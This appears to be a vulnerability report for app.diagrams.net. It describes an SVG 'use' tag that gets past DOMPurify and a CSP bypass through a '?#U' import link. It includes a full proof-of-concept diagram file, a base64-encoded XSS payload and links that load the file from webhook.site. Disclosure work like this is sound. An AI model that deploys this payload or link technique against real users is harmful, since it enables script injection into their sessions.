Description

The application allows the “use” tag to pass on dompurify, which leads to XSS. A strange behaviour bypasses the csp on app.diagrams.net when it has a “?” before the “#U” import.

Proof of Concept

POC diagram:

<?xml version="1.0" encoding="UTF-8"?>
<mxfile host="app.diagrams.netxyz" modified="2022-09-06T18:54:56.458Z" agent="5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36" etag="xY3UKbpTp-KH--H4WcwT" version="20.2.8">
  <diagram id="4FUsL0c-RG27eG5O0xMg" name="Page-1">
    <mxGraphModel dx="1422" dy="664" grid="1" gridSize="10" guides="1" tooltips="1" connect="1" arrows="1" fold="1" page="1" pageScale="1" pageWidth="827" pageHeight="1169" math="0" shadow="0">
      <root>
        <mxCell id="0" />
        <mxCell id="1" parent="0" />
        <mxCell id="L7LsTOqxvLqq3sj4AYtF-1xyz" value="Text<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x" /></svg>" style="text;html=1;strokeColor=none;fillColor=none;align=center;verticalAlign=middle;whiteSpace=wrap;rounded=0;" vertex="1" parent="1">
          <mxGeometry x="430" y="260" width="60" height="30" as="geometry" />
        </mxCell>
      </root>
    </mxGraphModel>
  </diagram>
</mxfile>

Raw payload:

<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoZG9jdW1lbnQuZG9tYWluKSIgLz4KPC9zdmc+#x" /></svg>

POC link

https://app.diagrams.net/?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341
https://viewer.diagrams.net/index.html?#Uhttps://webhook.site/d38b94cb-a6ab-4219-b9f3-d34434b76341